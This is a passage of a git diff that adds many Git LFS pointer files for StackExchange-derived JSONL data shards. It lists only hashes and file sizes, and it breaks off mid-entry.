https://git-lfs.github.com/spec/v1 +oid sha256:40958742468247bbee5d67c8f8759844f15543a44457b33215905e644849a90a +size 35391968 diff --git a/data/stackexchange/1-1/1733_2289.jsonl b/data/stackexchange/1-1/1733_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1904e6e96e9c1cc9e650b33eac8d79ff8f9d856 --- /dev/null +++ b/data/stackexchange/1-1/1733_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fbc8327d4ffa7efcab32994a0f25b286c03e93d985437d98cb225c94405fb13 +size 35307716 diff --git a/data/stackexchange/1-1/1734_2289.jsonl b/data/stackexchange/1-1/1734_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d404b35143dfb51ec757f67eb580f28368d58ffd --- /dev/null +++ b/data/stackexchange/1-1/1734_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5982fa04d76bc8de21263400810e0e347e71630e6303858ddecf8c8243ca333 +size 34908999 diff --git a/data/stackexchange/1-1/1735_2289.jsonl b/data/stackexchange/1-1/1735_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa02462a444a3ff15dc6e2c2576ad9dbfe286739 --- /dev/null +++ b/data/stackexchange/1-1/1735_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:82b21dea12c02948f7117bcdb49d984f8dd0183d8a1b8b73de81897eddf1a117 +size 35694730 diff --git a/data/stackexchange/1-1/1736_2289.jsonl b/data/stackexchange/1-1/1736_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7aade9befda01b21d3fa98f6ad0bf05ae6fc799b --- /dev/null +++ b/data/stackexchange/1-1/1736_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd321acb143fce91c9eadbea0a1d0226c10f913b08c85426387b32c8fe560df8 +size 35148803 diff --git a/data/stackexchange/1-1/1737_2289.jsonl b/data/stackexchange/1-1/1737_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c3ac21071f86d333be7e3ffb9ce8a743b7155b8 --- /dev/null +++ b/data/stackexchange/1-1/1737_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3cef4054c74fd9073ea141fd9a1484a9bf0d6b772f893ca8d94ee3598384318 +size 35368928 diff --git a/data/stackexchange/1-1/1738_2289.jsonl b/data/stackexchange/1-1/1738_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23dcd1373b4d48861a0081a2b4bdebe7df40b520 --- /dev/null +++ b/data/stackexchange/1-1/1738_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:92b92aa78b612c5d7046d8aa1299bd1369c81965c3fb76187cc8f2b985b9fb79 +size 35290028 diff --git a/data/stackexchange/1-1/1739_2289.jsonl b/data/stackexchange/1-1/1739_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af7cd626bf180f77cf9667e1685dd2551a361a75 --- /dev/null +++ b/data/stackexchange/1-1/1739_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29d3100b8cdb91dbae3af754a8869e048d2e9c6c638d1dc220ba4ba4caf91aac +size 37350029 diff --git a/data/stackexchange/1-1/173_2289.jsonl b/data/stackexchange/1-1/173_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d3e683e15b1d9535326c245db8f5d4b4d3fb4d6 --- /dev/null +++ b/data/stackexchange/1-1/173_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4f3d953884267fc3d45e3b61c26047ce6a156a7da5440d594b7f4beabc4323f +size 35452933 diff --git a/data/stackexchange/1-1/1740_2289.jsonl b/data/stackexchange/1-1/1740_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e590ac31946fc350f4ba28510fc1c154e316d24 --- /dev/null +++ b/data/stackexchange/1-1/1740_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d456fc09c6923a6671a6bcd1548ddbf330736f3ee20d63e598e07abd7d7332e +size 38417945 diff --git a/data/stackexchange/1-1/1741_2289.jsonl b/data/stackexchange/1-1/1741_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a15fe57dcb8829bfec79989ac37fac33573882e --- /dev/null +++ b/data/stackexchange/1-1/1741_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:963c043965fa2ba6ef68d98eb8536d69ef41389a9c28cea2ca8d9e44baff6d36 +size 37423319 diff --git a/data/stackexchange/1-1/1742_2289.jsonl b/data/stackexchange/1-1/1742_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a86adb5d6b81379df713e98d93015b8d1c300eb9 --- /dev/null +++ b/data/stackexchange/1-1/1742_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ff0e6a6c1dd0ad573a4528f66708bc5c4d2755b147bcac51d8846969433db28 +size 37639621 diff --git a/data/stackexchange/1-1/1743_2289.jsonl b/data/stackexchange/1-1/1743_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d620ade718ed035aa803710c86f1ce0ccfd84c8f --- /dev/null +++ b/data/stackexchange/1-1/1743_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d85b3f42eae487878ae4cfb92cfb31e56f83caf2c40c611a072f993db886593c +size 37853422 diff --git a/data/stackexchange/1-1/1744_2289.jsonl b/data/stackexchange/1-1/1744_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24d9707f42c2cb93cfdd5f400bd732da5683eb03 --- /dev/null +++ b/data/stackexchange/1-1/1744_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9269a5dd158c6d49bd51eee940cbdc2e6e2ca11a981b654dbac1dbb20f6e499 +size 38012466 diff --git a/data/stackexchange/1-1/1745_2289.jsonl b/data/stackexchange/1-1/1745_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..62cc6d4f92b76219e7da8cc8955593b0afacc1e0 --- /dev/null +++ b/data/stackexchange/1-1/1745_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ea6e0f9e639cf2f73fbf21fd0d1a1e2609fc7772247268b6243e07c27e2133f6 +size 38270965 diff --git a/data/stackexchange/1-1/1746_2289.jsonl b/data/stackexchange/1-1/1746_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b88343c814c0b90cd2e1dd1e07d3487c5f7cefc8 --- /dev/null +++ b/data/stackexchange/1-1/1746_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9cd542acfca1804f6990f2125b8e76124768eb9870b5db93eeb23c0c1e5f263 +size 38426954 diff --git a/data/stackexchange/1-1/1747_2289.jsonl b/data/stackexchange/1-1/1747_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4eccd1380ac573aeacccfadd03e42b2fd58cf55c --- /dev/null +++ b/data/stackexchange/1-1/1747_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:666258e5f4c75508fc4b5518f7edd27f2bfe9c7c317638674ac23c3b49828278 +size 38136188 diff --git a/data/stackexchange/1-1/1748_2289.jsonl b/data/stackexchange/1-1/1748_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e0beb5d67c13c3f8b12eca116fe97d6bd04b97c --- /dev/null +++ b/data/stackexchange/1-1/1748_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ed532cdda2d943f67294dfa8a0a1458502f8dbe0adf8a0006fc731fb9d2f7f6 +size 37544322 diff --git a/data/stackexchange/1-1/1749_2289.jsonl b/data/stackexchange/1-1/1749_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4677937adc5863573ad959bfd936e395bf694fdf --- /dev/null +++ b/data/stackexchange/1-1/1749_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abe6d8eeb9c2b552a9c3afe2edad41a50083c48a855eb3aa9258657770cc74b9 +size 37459687 diff --git a/data/stackexchange/1-1/174_2289.jsonl b/data/stackexchange/1-1/174_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c22dd006cca048ebf2c0eed71906880848c05e2f --- /dev/null +++ b/data/stackexchange/1-1/174_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b210d98eb69a8518ab909ec347a33a77de791ae1b6b436d430801cdbd4ab0d97 +size 34970742 diff --git a/data/stackexchange/1-1/1750_2289.jsonl b/data/stackexchange/1-1/1750_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c6297fdc53b6397ef310942ce413707f04475b1 --- /dev/null +++ b/data/stackexchange/1-1/1750_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fada8052c8f8cb1ae58a8d28d7c66868317c79b0b94d37a1c8391f48e8df6938 +size 38085702 diff --git a/data/stackexchange/1-1/1751_2289.jsonl b/data/stackexchange/1-1/1751_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd98ce9f566b9e9b52e44929f1e2b64aec6dc1a1 --- /dev/null +++ b/data/stackexchange/1-1/1751_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc53a90b006c4e6054a20664fa1cb9c686398e888d6b5c0ad1e21cba78f9c007 +size 37462905 diff --git a/data/stackexchange/1-1/1752_2289.jsonl b/data/stackexchange/1-1/1752_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69fc4c5c2b09565a3a4f12e312d2287baefeb6cb --- /dev/null +++ b/data/stackexchange/1-1/1752_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1c1bc29521e13c6f3c255cc23bcb4f2556cc098d421bc035a411c9bc6e7a3c73 +size 37669022 diff --git a/data/stackexchange/1-1/1753_2289.jsonl b/data/stackexchange/1-1/1753_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fa11bdf7e02052dc5934f22dc6fc5cb8ebad67f --- /dev/null +++ b/data/stackexchange/1-1/1753_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eddc8c478776ed362f86231eb87eaa80faff914096660d934808223eecb8bf5b +size 38101108 diff --git a/data/stackexchange/1-1/1754_2289.jsonl b/data/stackexchange/1-1/1754_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..663b22f14a474cff5b66c796206ccc68e2a51366 --- /dev/null +++ b/data/stackexchange/1-1/1754_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f908094b98757f5a05248d99f60ad0bafa6b5935f28f46766203c5d767af767a +size 37709014 diff --git a/data/stackexchange/1-1/1755_2289.jsonl b/data/stackexchange/1-1/1755_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..12aa826b638d8ad0b6f4c5f611473090614e5de3 --- /dev/null +++ b/data/stackexchange/1-1/1755_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b482ea5f6f348e45d3372105ebf94baa0a4d40099910ce56d66a2a8fcad78a76 +size 38261119 diff --git a/data/stackexchange/1-1/1756_2289.jsonl b/data/stackexchange/1-1/1756_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83baea6f989c82edc07f15c24bbf1e94995f5b34 --- /dev/null +++ b/data/stackexchange/1-1/1756_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fc15e213785a362c58518bc43c48b554f57b337643c145ec1b1a69d9ba4b119 +size 38198523 diff --git a/data/stackexchange/1-1/1757_2289.jsonl b/data/stackexchange/1-1/1757_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c917aab83837c9615abd980d313216c8f229cc2 --- /dev/null +++ b/data/stackexchange/1-1/1757_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1475c31c32ee6355b18dcc5dc3fba195e8c531715e6cbf0852c6a0bae6f8253 +size 37885046 diff --git a/data/stackexchange/1-1/1758_2289.jsonl b/data/stackexchange/1-1/1758_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6c48935b49733266d04493c84363cb895580be34 --- /dev/null +++ b/data/stackexchange/1-1/1758_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ab727e62bf749d9be81beddd2de5899e6eedaea8043874df99d1abbf256ac910 +size 38191091 diff --git a/data/stackexchange/1-1/1759_2289.jsonl b/data/stackexchange/1-1/1759_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17d7e651874673b81785ee5558dbb53bad599eb7 --- /dev/null +++ b/data/stackexchange/1-1/1759_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:928212f973d50671d0c6b393ff4b05421bd7f00e16c2f2b367b32f5dc209f1cf +size 37596338 diff --git a/data/stackexchange/1-1/175_2289.jsonl b/data/stackexchange/1-1/175_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46dacfeb2aa2ee91e87c3573349763204b36d606 --- /dev/null +++ b/data/stackexchange/1-1/175_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eeb99a305244f4e7c64f4035be76a928753c420b5a3420cd372ac28a61a6ab3d +size 34519722 diff --git a/data/stackexchange/1-1/1760_2289.jsonl b/data/stackexchange/1-1/1760_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f87cc081b86148b25789f06aa92da10de70bde0b --- /dev/null +++ b/data/stackexchange/1-1/1760_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2156e8297759a98db7b539bc07b27b99cbeb8e927fcc1a587ac1b909e63e02fb +size 37853876 diff --git a/data/stackexchange/1-1/1761_2289.jsonl b/data/stackexchange/1-1/1761_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8494e526ad1683ce2a9db0001207d1b313ea3cf9 --- /dev/null +++ b/data/stackexchange/1-1/1761_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85310f9f3caa60eb66cbaf24200090bf90854b950e302e9e9f3cb0a83630365d +size 37329643 diff --git a/data/stackexchange/1-1/1762_2289.jsonl b/data/stackexchange/1-1/1762_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6d07f5d4ffe30da0e5d0bf722863f19ecc82ac47 --- /dev/null +++ b/data/stackexchange/1-1/1762_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:78adb991dc55af7123f9ca747a53bb0a804b8f51fbf122edfe48e8572f7ac8dc +size 37713989 diff --git a/data/stackexchange/1-1/1763_2289.jsonl b/data/stackexchange/1-1/1763_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae296f59af6bad1ca60f1597fd7401cbca5e56f7 --- /dev/null +++ b/data/stackexchange/1-1/1763_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c406137f1e79b60b80c89cd0925af31e5c9f873d36fca94d117d13811d8013 +size 38061217 diff --git a/data/stackexchange/1-1/1764_2289.jsonl b/data/stackexchange/1-1/1764_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b863114f5a85aa17ec133613c6bf986cfc1c661b --- /dev/null +++ b/data/stackexchange/1-1/1764_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5159c8e708979b45799ae5440a307cf7184a60a6071cd51c4966f53a52eed1ef +size 37668614 diff --git a/data/stackexchange/1-1/1765_2289.jsonl b/data/stackexchange/1-1/1765_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3931bdd5af387d337e00ceda1fcc4ab8960aed4 --- /dev/null +++ b/data/stackexchange/1-1/1765_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24e49067fbc21f87c8a875c6d2098bacc4d0e1de4d99282cf1c893bbe4295ee2 +size 37752740 diff --git a/data/stackexchange/1-1/1766_2289.jsonl b/data/stackexchange/1-1/1766_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..010cb6607d616fb268e3ac6ce5003e6f5acaa608 --- /dev/null +++ b/data/stackexchange/1-1/1766_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0116f2ef9cf504f1f72055b8e3b2c04300371b12b3f628f8dd95d3e61c675cce +size 38101718 diff --git a/data/stackexchange/1-1/1767_2289.jsonl b/data/stackexchange/1-1/1767_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e91c520f1c3680cd2a4e8340f6a89e7d7409e2 --- /dev/null +++ b/data/stackexchange/1-1/1767_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f39a6da1a626d495bad8b75af68714579e731ccc04feceffa1703a94f7b0f19 +size 37425331 diff --git a/data/stackexchange/1-1/1768_2289.jsonl b/data/stackexchange/1-1/1768_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c7b6503eeb3039bf704149070b9262b367709bd --- /dev/null +++ b/data/stackexchange/1-1/1768_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b097451db1ba96d14c4919126853b4327abad1bdf509958f2b3c1a0a97488b1 +size 37999838 diff --git a/data/stackexchange/1-1/1769_2289.jsonl b/data/stackexchange/1-1/1769_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..67e02fd56ef3ba84240214ba045fdd9987d25432 --- /dev/null +++ b/data/stackexchange/1-1/1769_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:416fb460c2cbdb8be67d5f88051ed41c0fda1d9abe2acaa81af80a8d1b8653ba +size 38112960 diff --git a/data/stackexchange/1-1/176_2289.jsonl b/data/stackexchange/1-1/176_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..540f6b56ea6d363cae546fea61be933c41ed647f --- /dev/null +++ b/data/stackexchange/1-1/176_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7d6d46e7c155ca35d73e523da51d105a1d2eca825d4b7644b6a14b64981c53c +size 35147994 diff --git a/data/stackexchange/1-1/1770_2289.jsonl b/data/stackexchange/1-1/1770_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2c28bf92c3798e6876be7f4386cb2f9edf0ff0e9 --- /dev/null +++ b/data/stackexchange/1-1/1770_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eebe1e9da5b4548efb81aa0d9fcf43c4e12650b29b2fd7491995183dd147012f +size 38317106 diff --git a/data/stackexchange/1-1/1771_2289.jsonl b/data/stackexchange/1-1/1771_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32c49566826844230e1bb03285beb2f36a987606 --- /dev/null +++ b/data/stackexchange/1-1/1771_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9620651636fe34cd6c85f05823b0d173673f3f770a0929ed3656861ae67eada8 +size 37718654 diff --git a/data/stackexchange/1-1/1772_2289.jsonl b/data/stackexchange/1-1/1772_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26caed43f79a633db1ae093f1431b42064bb211d --- /dev/null +++ b/data/stackexchange/1-1/1772_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12939f996b745ac24651108e1ac9c1579eb08b7a7ba94735c11174b47b4b4df7 +size 37313659 diff --git a/data/stackexchange/1-1/1773_2289.jsonl b/data/stackexchange/1-1/1773_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..354ebcd368e27d6d9cef9bc2980e028acb185e0c --- /dev/null +++ b/data/stackexchange/1-1/1773_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:825d2b1e4535ca71314f1a04908748ff264b1c983462f42d5843b3823510aac6 +size 37946870 diff --git a/data/stackexchange/1-1/1774_2289.jsonl b/data/stackexchange/1-1/1774_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea6b463fdebca58439d933c25c47c4625e4a057e --- /dev/null +++ b/data/stackexchange/1-1/1774_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71d5c3aac83484f886cd53700070f4aff887747d1bb9439917c2e717f4a06abc +size 38083896 diff --git a/data/stackexchange/1-1/1775_2289.jsonl b/data/stackexchange/1-1/1775_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7099dfd143e5a39a9208accb5b3501b9f0d7f1eb --- /dev/null +++ b/data/stackexchange/1-1/1775_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5f1ae54ba5605a4af129776325baf6533f173b9c6879d8a92f983433cc16910e +size 38019607 diff --git a/data/stackexchange/1-1/1776_2289.jsonl b/data/stackexchange/1-1/1776_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d9c2f55101e2c1912de2a2977db0d9f493a9118d --- /dev/null +++ b/data/stackexchange/1-1/1776_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40f848930dd0f69fa1a10f76b6c135206caf442093ef26ca6771c43264f0ddb1 +size 37829279 diff --git a/data/stackexchange/1-1/1777_2289.jsonl b/data/stackexchange/1-1/1777_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d912fa10ad98e8b458334e7dbc3362c7fe744419 --- /dev/null +++ b/data/stackexchange/1-1/1777_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e485276564099a1dde99d3910a04467d0f09514fd7fc1633d3a810491bd8604 +size 38300540 diff --git a/data/stackexchange/1-1/1778_2289.jsonl b/data/stackexchange/1-1/1778_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f3b8b54d3f296204c464f1826e3811838296cdd --- /dev/null +++ b/data/stackexchange/1-1/1778_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce7d29a39deb2600396e5d07ef3989f47cfbee5f2230bdafcdc7596c2dd38463 +size 37707519 diff --git a/data/stackexchange/1-1/1779_2289.jsonl b/data/stackexchange/1-1/1779_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1cd7dabaea1fbf545451a8a9dbbc71804ecaa497 --- /dev/null +++ b/data/stackexchange/1-1/1779_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3038a80134c1c86a84a9eb772aefdf3390870451a4e96d488e6725d06a56b300 +size 38132306 diff --git a/data/stackexchange/1-1/177_2289.jsonl b/data/stackexchange/1-1/177_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84ae25fa402867f18a9b3d9b0f306db6529b98de --- /dev/null +++ b/data/stackexchange/1-1/177_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cb9de0b71e16197c55e68eb22e579516f3efa8657962321b769d56338e9034a +size 35525548 diff --git a/data/stackexchange/1-1/1780_2289.jsonl b/data/stackexchange/1-1/1780_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f42d4066b4c80972ac30eba1f1e513824675a7e --- /dev/null +++ b/data/stackexchange/1-1/1780_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99bd376f58a2c481b947e07d54da2ba8f414b95b09e636928ac49c3eb9b8803d +size 37648597 diff --git a/data/stackexchange/1-1/1781_2289.jsonl b/data/stackexchange/1-1/1781_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0337840062a65a287bd3010813f370016d1a43c8 --- /dev/null +++ b/data/stackexchange/1-1/1781_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:565d610c8f73ca38bc6555cc1b270e1e99076bbc35e2236bf899dbc57339d813 +size 38000667 diff --git a/data/stackexchange/1-1/1782_2289.jsonl b/data/stackexchange/1-1/1782_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1a77816ff3b153686bf53e5826694e7b4f71ef4 --- /dev/null +++ b/data/stackexchange/1-1/1782_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:01fb6d7bca7cff70edeb03497dde070d515f468d124cd2a052ffae46fe84804b +size 38243326 diff --git a/data/stackexchange/1-1/1783_2289.jsonl b/data/stackexchange/1-1/1783_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65cae49f1389a2418c5569b946812bec55dfedea --- /dev/null +++ b/data/stackexchange/1-1/1783_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c7496216254f5272c5285f7740eb1d8c3231154fa25df2814a4d0b3aa6fdf4eb +size 37649294 diff --git a/data/stackexchange/1-1/1784_2289.jsonl b/data/stackexchange/1-1/1784_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4d2929d7f5ffa4fe9e3f5970448e0dc4cbcbeb77 --- /dev/null +++ b/data/stackexchange/1-1/1784_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd3b9d035cda94919a5bb995671187209ff02069cc162e63df2255b0c59ea6f0 +size 38219931 diff --git a/data/stackexchange/1-1/1785_2289.jsonl b/data/stackexchange/1-1/1785_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..02d3aa42225f39012db97b5b41a9d91f93665420 --- /dev/null +++ b/data/stackexchange/1-1/1785_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e4689dabdf42bad283276c31314540f71394fb868cb5c9f02629333329da75ac +size 37355699 diff --git a/data/stackexchange/1-1/1786_2289.jsonl b/data/stackexchange/1-1/1786_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d04eff4b05596d23a8dfb70ccd60cdb56677ddf --- /dev/null +++ b/data/stackexchange/1-1/1786_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a686ca969583f2949901ab2239b7d9a03537460d85d495fe54376dd72d854332 +size 37534718 diff --git a/data/stackexchange/1-1/1787_2289.jsonl b/data/stackexchange/1-1/1787_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7bfaaf978f6a0c11b485fa3a369eb73151ec56b --- /dev/null +++ b/data/stackexchange/1-1/1787_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6485c81876c5d34b8e8573a496b8fa82b86e7a35a5a710b18a78766060a3952e +size 38402633 diff --git a/data/stackexchange/1-1/1788_2289.jsonl b/data/stackexchange/1-1/1788_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10bb9308fc491e9b61e507fffe19d8cadd286965 --- /dev/null +++ b/data/stackexchange/1-1/1788_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93bdf8ad210b49bc186a2c865a5de073535095d04455514d82c3b761c107b719 +size 38185797 diff --git a/data/stackexchange/1-1/1789_2289.jsonl b/data/stackexchange/1-1/1789_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c17e07945c1c631ce5eb272b28cb293f417de5c6 --- /dev/null +++ b/data/stackexchange/1-1/1789_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a7bfc8c5b0a9c5666cf22dc6d4ec0d4db19e53b3fe146f2109385adc3a2ec7f +size 40369110 diff --git a/data/stackexchange/1-1/178_2289.jsonl b/data/stackexchange/1-1/178_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8d7c1b517bce56b46317a44151ba33e866fac1d5 --- /dev/null +++ b/data/stackexchange/1-1/178_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53a352b2a1d1a922ae675e88b95506a567a66b7a1669a4a44f7e2d3a44a5d745 +size 35418676 diff --git a/data/stackexchange/1-1/1790_2289.jsonl b/data/stackexchange/1-1/1790_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91931c3d0ca5a6b5dd80a7739134d90d391c7a35 --- /dev/null +++ b/data/stackexchange/1-1/1790_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45d81e12eb65793ad96d9d49d20a52b2124297cf1c5617000b0a586376c74375 +size 41241497 diff --git a/data/stackexchange/1-1/1791_2289.jsonl b/data/stackexchange/1-1/1791_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18066a931bdd806e6575aa26e4a285b778d12800 --- /dev/null +++ b/data/stackexchange/1-1/1791_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 